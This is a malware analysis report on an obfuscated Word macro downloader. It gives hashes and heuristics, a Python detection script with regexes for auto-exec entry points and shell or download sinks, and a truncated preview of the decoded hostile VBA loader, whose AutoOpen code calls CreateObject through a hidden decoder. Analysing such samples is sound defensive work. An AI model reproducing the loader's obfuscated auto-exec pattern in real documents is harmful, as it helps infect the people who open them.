Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5cdfb95ff096adb5…

MALICIOUS

Office (OLE)

Size: 156.1 KB
Created: 2019-10-24 16:48:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: abe66d000ab954f1e2ef53b2a8423241
SHA-1: eac5ee82924f15091b90bc22c9a06676c40d04f8
SHA-256: 5cdfb95ff096adb5ce4140f5f84b7f4d32fe17ced178f1e11c955f3846996da6
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The file carries a heavily obfuscated VBA macro project with an AutoOpen entry point, the shape of a macro downloader. The decoded source is padded with junk comments and dead assignments (fake postal addresses, browser user-agent strings, IP-address literals, trigonometric and conversion calls whose results are never read), and the only operative statement in the preview is a CreateObject call whose argument is produced by a decoder function applied twice (Qwxlkupcbtk(Qwxlkupcbtk(...))), so no ProgID, command line or URL appears as a literal. ClamAV independently classifies the file as a generic document downloader. Nothing on this page identifies the second-stage payload or where it is fetched from; recovering that requires decoding the string routine or running the document in a sandbox.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7356067-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7356067-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the ProgID, command line and URL out of the macro source as literals. In this sample CreateObject itself is visible, but its argument is the output of a decoder function applied twice (Qwxlkupcbtk(Qwxlkupcbtk(...))), so plain string extraction does not show what gets instantiated.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject to instantiate a COM object at runtime; which object depends on the decoded ProgID, which is not visible in the source.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches documents that carry only p-code, or whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the generic wording is partly stale: a VBA project was recovered (OLE_VBA_MACROS, macros.bas below), so the marker corroborates the AutoOpen finding rather than adding independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI carried by embedded Office drawing content; it is not a download or command-and-control indicator.
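The loader shape the heuristics above describe (an auto-exec entry point, a string decoder, a CreateObject or Shell sink, and decoy padding around them) can be checked directly against decoded VBA source. The Python below is an added example written for this page, not code from this report, from the scanner that produced it, or from oletools. It scores a module for the OLE_VBA_AUTOOPEN, OLE_VBA_CREATEOBJ and OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER signals: entry-point and sink regexes, the three decoder shapes plus the nested-call sink argument seen in this sample, and a decoy ratio built from junk comment lines and assignments whose target is never read again. The keyword lists, the thresholds (8 Chr/hex hits, 40 % decoy lines) and the names `triage`/`Triage` are assumptions. The first input is a shortened excerpt of the macro preview below with a constructed `AutoOpen` stub (the preview is truncated before the entry point the scanner reports); the second is a constructed benign `Document_Open` macro for contrast.

```python
"""Added example: score decoded VBA source for the obfuscated auto-exec loader shape."""
import re
from collections import Counter
from dataclasses import dataclass

# Entry points Office runs as soon as macros are enabled (assumed list).
AUTOEXEC_RE = re.compile(
    r"\b(Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|AutoNew|Document_Open|"
    r"Document_Close|Workbook_Open|Workbook_Activate|Auto_Open)\b", re.I)
# COM-instantiation, execution and download sinks (assumed list).
SINK_RE = re.compile(
    r"\b(CreateObject|GetObject|Shell|ShellExecute|WScript\.Shell|URLDownloadToFile|"
    r"XMLHTTP|ADODB\.Stream|\.Run|\.Exec)\b", re.I)
# Decoder shapes named by OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER; hit thresholds are assumptions.
CHR_ARRAY_RE = re.compile(r"\bChrW?\s*\(\s*\d+\s*\)", re.I)            # Chr(87) & Chr(83) ...
HEX_RE = re.compile(r"&H[0-9A-F]{2}", re.I)                            # &H57 &H53 ...
JUNK_REPLACE_RE = re.compile(r'\bReplace\s*\(.*?,\s*"[^"]+"\s*,\s*""\s*\)', re.I)
# Sink whose argument is a nested call instead of a literal: CreateObject(f(f(x))).
INDIRECT_SINK_RE = re.compile(r"\b(CreateObject|GetObject|Shell)\s*\(\s*[A-Za-z_]\w*\s*\(", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.I)

@dataclass
class Triage:
    autoexec: bool
    sinks: list
    indirect_sink: bool
    decoder_shapes: list
    dead_assignments: int
    decoy_ratio: float
    score: int
    verdict: str

def triage(src):
    """Score one decoded VBA module or project; returns a Triage record."""
    lines = [l for l in src.splitlines() if l.strip()]
    comments = [l for l in lines if l.strip().startswith("'")]
    code = [l for l in lines if not l.strip().startswith("'")]
    code_text = "\n".join(code)
    counts = Counter(w.lower() for w in re.findall(r"[A-Za-z_]\w*", code_text))
    # Assignments whose target is never referenced again: decoy padding around the real logic.
    dead = sum(1 for l in code
               if (m := ASSIGN_RE.match(l)) and counts[m.group(1).lower()] == 1)
    autoexec = bool(AUTOEXEC_RE.search(code_text))
    sinks = sorted({m.group(1).lstrip(".") for m in SINK_RE.finditer(code_text)})
    indirect = bool(INDIRECT_SINK_RE.search(code_text))
    shapes = []
    if len(CHR_ARRAY_RE.findall(code_text)) >= 8:
        shapes.append("numeric char-array")
    if len(HEX_RE.findall(code_text)) >= 8:
        shapes.append("repeated hex-string decode")
    if JUNK_REPLACE_RE.search(code_text):
        shapes.append("junk-token Replace removal")
    if indirect:
        shapes.append("sink argument built by nested decoder call")
    decoy_ratio = (len(comments) + dead) / max(1, len(lines))
    score = 2 * autoexec + 2 * bool(sinks) + 2 * bool(shapes) + 2 * (decoy_ratio >= 0.4)
    if autoexec and sinks and shapes:
        verdict = "obfuscated auto-exec loader"
    elif autoexec and sinks:
        verdict = "auto-exec macro with execution sink"
    elif autoexec:
        verdict = "auto-exec macro, no execution sink"
    else:
        verdict = "no auto-exec entry point"
    return Triage(autoexec, sinks, indirect, shapes, dead, round(decoy_ratio, 2), score, verdict)

# Shortened excerpt of the decoded macro shown on this page. The AutoOpen stub is
# constructed: the page's preview is truncated before the entry point the scanner reports.
SAMPLE_LOADER = """
Attribute VB_Name = "Hcpsmkkdq"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
''''''Jagodzinski, Adamiec and Lisowski Suite 817 Northeast Kowal Inc Suite 493 Northwest
Kxflvppplsji = Log("Mozilla/5.0 (Windows NT 6.0; WOW64; rv:10.6) Gecko/20100101 Firefox/10.6.8")
Vdnkdmqss = Atn(Dyiutqntj)
''''''Cybulski Inc Apt. 279 East Wesolowski, Sawicki and Chmiel Suite 107 Southwest
Niiiontpereu = Sin(310)
Set qiwhdjkasd = CreateObject(Qwxlkupcbtk(Qwxlkupcbtk(qiwhdjkasdA)))
Bmwqgeytiwd = Sgn("Towels")
End Function
Sub AutoOpen()
Set Obj = qiwhdjkasd(Xyz)
End Sub
"""

# Constructed benign document macro for contrast: auto-exec entry point, no sink, no decoys.
SAMPLE_BENIGN = """
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    ' stamp the footer with the date the document was opened
    ActiveDocument.Sections(1).Footers(1).Range.Text = "Opened " & Format(Now, "yyyy-mm-dd")
End Sub
"""

if __name__ == "__main__":
    for name, src in (("loader excerpt", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(name, triage(src))
```

Feed it the whole decoded project (for example the concatenated olevba output) rather than one module at a time, because the decoder, the CreateObject caller and the entry point need not live in the same module. The source pass is blind when only p-code survives or extraction fails; that gap is what OLE_VBA_PCODE_AUTOEXEC_EXEC covers by tokenising the compiled stream instead.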

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40,304 bytes
SHA-256: 1e2736760bd3c1fb4f8f78fbe9ee15ca824cb8a46b66330baaf2e95f65fad680
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Siyhmqighwa"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Thmguhieggyj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Wiqtpyqtmclni, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Xsjogrtybffqy, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Zqkpnawh, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Ensbugofql, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Yictvccuuwxpj, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Hhruynkwjh, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Nbzlbcbnfscr, 7, 7, MSForms, CommandButton"

Attribute VB_Name = "Hcpsmkkdq"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
   ''''''Jagodzinski, Adamiec and Lisowski Suite 817 Northeast Kowal Inc Suite 493 Northwest
''''''Cybulski Inc Apt. 279 East Wesolowski, Sawicki and Chmiel Suite 107 Southwest
Kxflvppplsji = Log("Mozilla/5.0 (Windows NT 6.0; WOW64; rv:10.6) Gecko/20100101 Firefox/10.6.8")
Vdnkdmqss = Atn(Dyiutqntj)
Elhorgdc = "Schultz LLCSuite 392Southwest"
''''''Orzechowski, Frankowski and Fratczak Apt. 026 West Klosowski - Koziel Apt. 791 North
Niiiontpereu = Sin(310)
''''''Jarosz Inc Apt. 550 South Zielonka, Kowalski and Orzechowski Suite 133 Southeast
Qhurbwocauzc = CLng(Vkppsoqqzlf)
Dfqwkgqxkllb = CInt(333)
''''''Jezierski - Czajkowski Suite 008 West Kopczynski, Lech and Skowronek Suite 079 Southeast
''''''Stanislawski, Misiak and Stachura Apt. 018 North Szymczyk Inc Suite 210 Northwest
Kinjmleuu = Rnd(Cpbahjmydkx)
Ovmrkydowjfil = Sin(176)
''''''Paszkowski Inc Suite 223 Southeast Filipiak, Miskiewicz and Mucha Apt. 866 Southeast
Sojlnhiqoxcc = "Mozilla/5.0 (Windows NT 5.3; WOW64; rv:15.3) Gecko/20100101 Firefox/15.3.3"
Sumypuqy = Vzaffwswgt
''''''Makowski Group Suite 229 Northwest Wypych, Bartczak and Kosowski Suite 137 Southwest
Bmwqgeytiwd = Sgn("Towels")
Psjvibtb = Sqr(Nhcksfgwfve)
Cznmatby = "Chips"
''''''Drozd, Wojciechowski and Józwik Suite 520 Northeast Mikulski, Jagielski and Skowronski Apt. 239 Southwest
Cqdiaxrnncw = Tan(763)
Set qiwhdjkasd = CreateObject(Qwxlkupcbtk(Qwxlkupcbtk(qiwhdjkasdA)))
   ''''''Gasior - Piwowarczyk Suite 408 South Janik and Sons Suite 028 West
''''''Kulig, Sosnowski and Malec Suite 959 Southeast Kruszewski - Kowalewski Apt. 670 Southwest
Zebdtcncvm = CStr("Swaniawski, McLaughlin and HayesApt. 364Southwest")
Nxnyqeucgkvsj = Sin(Vugzsvuojdi)
Pvyhfyoeiefgu = "Von GroupApt. 729North"
''''''Pietras and Sons Apt. 978 West Graczyk Group Suite 683 West
Oiitvorip = CSng(120)
''''''Jagielski - Stachowiak Suite 416 Northwest Gajewski, Bielak and Orzechowski Apt. 164 South
Bsjeuhzymlmnn = CInt(Jnqasxlpza)
Jhymiuhwvve = CLng(89)
''''''Sobczak, Nowacki and Krawczyk Apt. 079 North Skiba - Michalowski Apt. 041 Southwest
''''''Krajewski, Andrzejczak and Madej Suite 097 Northeast Radomski, Gwózdz and Zak Apt. 543 Southeast
Hwxtbvvilfeso = Log(Qckeztqq)
Esfonojgclanw = Cos(618)
''''''Raczynski Group Apt. 206 West Wójtowicz - Dziedzic Apt. 155 West
Zfycuutzh = "Schuppe, Mraz and MohrSuite 691South"
Kzleqgjtxcqu = Ummjzdfmzan
''''''Grzegorczyk - Kepa Suite 366 Northwest Jedrzejczak - Adamowicz Suite 051 North
Ueksxiudjvx = Rnd("Computer")
Ecacilalzihq = CSng(Nyalrysp)
Jtmdmlqoof = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/533.1.2 (KHTML, like Gecko) Chrome/33.0.806.0 Safari/533.1.2"
''''''Kapusta, Kowal and Krysiak Apt. 519 Southeast Kwiecien Inc Suite 161 Northwest
Mwrcrcuw = Fix(193)
End Function
Function Stzzlrrct()
On Error Resume Next
   ''''''Niewiadomski - Kisiel Apt. 534 North Przybylski Group Apt. 930 Southeast
''''''Kwiecien Group Apt. 048 North Zarzycki - Jasinski Apt. 614 Northwest
Nzgpgcnxpre = Log("129.181.187.87")
Turqmvlwuzs = Rnd(Ygeafcyhi)
Wkxenutdj = "12.229.18.35"
''''''Wróblewski, Michalak and Wróbel Suite 04
... (truncated)